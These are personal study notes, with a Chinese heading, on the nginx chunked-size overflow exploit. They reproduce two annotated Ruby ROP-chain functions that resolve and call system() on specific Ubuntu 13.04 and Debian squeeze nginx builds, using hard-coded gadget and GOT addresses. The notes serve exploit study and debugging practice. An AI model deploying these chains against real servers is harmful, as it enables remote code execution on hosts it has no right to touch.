nginx chunked size exploits笔记
最近动手调试太少,很多东西都忘记了,记一下笔记
# ROP chain for the Ubuntu 13.04 nginx build: derives the absolute address of
# system() from the GOT entry of localtime_r (GOT value + a fixed offset) and
# then transfers control to it, with target['Writable'] as its argument.
#
# Every value below is a hard-coded absolute gadget/GOT address in this one
# binary; the chain cannot adapt to a randomised base, so it is only valid for
# that exact build (a non-PIE layout is presumed -- TODO confirm).
#
# Returns the chain packed as little-endian 32-bit words ('V*').
# Depends on target['Writable'] being supplied by the enclosing exploit module
# (not defined in this file).
def dereference_got_ubuntu_1304
chain = [
0x08094129, # pop esi; ret                       -> esi = address of localtime_r's GOT slot
0x080c5090, # GOT for localtime_r
0x0804c415, # pop ecx ; add al, 29h ; ret        -> ecx = distance from localtime_r to system
0x001a4b00, # Offset to system
0x080c360a, # add ecx, [esi] ; adc al, 41h ; ret -> ecx = *GOT(localtime_r) + offset = system()
0x08076f63, # push ecx ; add al, 39h ; ret       -> pushes ecx; the ret then pops it into eip
0x41414141, # Garbage return address. Author's note: got stuck at this line while stepping --
            # when the gadget above executes, it pushes the absolute address of system here,
            # so the ret enters the system() call. 32-bit call stack layout:
            # func ; return address ; parameters ...
target['Writable'], # ptr to .data where contents have been stored (becomes system()'s argument)
]
return chain.pack('V*')
end
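# ROP chain for the Debian squeeze nginx build, same idea as the Ubuntu variant:
# the GOT entry of localtime_r is read through an adjusted base register (ebx),
# a fixed offset is added to obtain system(), and `call eax` enters it with
# target['Writable'] as the argument.
#
# As above, every value is a hard-coded absolute gadget/GOT address valid only
# for this one binary layout (non-PIE presumed -- TODO confirm).
#
# Returns the chain packed as little-endian 32-bit words ("V*").
# Depends on target['Writable'] from the enclosing exploit module (not defined
# in this file).
#
# Fixes vs. the transcribed original: `def`/`return` had lost the space before
# their operand (unparsable Ruby), and the subtraction that was split across
# two lines is written on one line.
def dereference_got_debian_squeeze
chain = [
0x0804ab34, # pop edi ; pop ebp ; ret             -> edi = adjusted GOT address, ebp = padding
0x080B4128 - 0x5d5b14c4, # 0x080B4128 => GOT for localtime_r; 0x5d5b14c4 => Adjustment
            # (cancels the +0x5d5b14c4 displacement of the add gadget below)
0x41414141, # padding (ebp)
0x08093c75, # mov ebx, edi ; dec ecx ; ret        -> ebx = GOT(localtime_r) - 0x5d5b14c4
0x08067330, # pop eax # ret
0xfffb0c80, # offset                              -> eax = distance from localtime_r to system
            # (taken as a 32-bit two's-complement value, presumably)
0x08078a46, # add eax, [ebx+0x5d5b14c4] # ret     -> eax = *GOT(localtime_r) + offset = system()
0x0804a3af, # call eax # system .... Author's note on call: 1. push eip, 2. eip = eax; the stack
            # is then "old eip, target['Writable']" -- the same shape as an ordinary function call.
target['Writable'] # ptr to .data where contents have been stored
]
return chain.pack("V*")
end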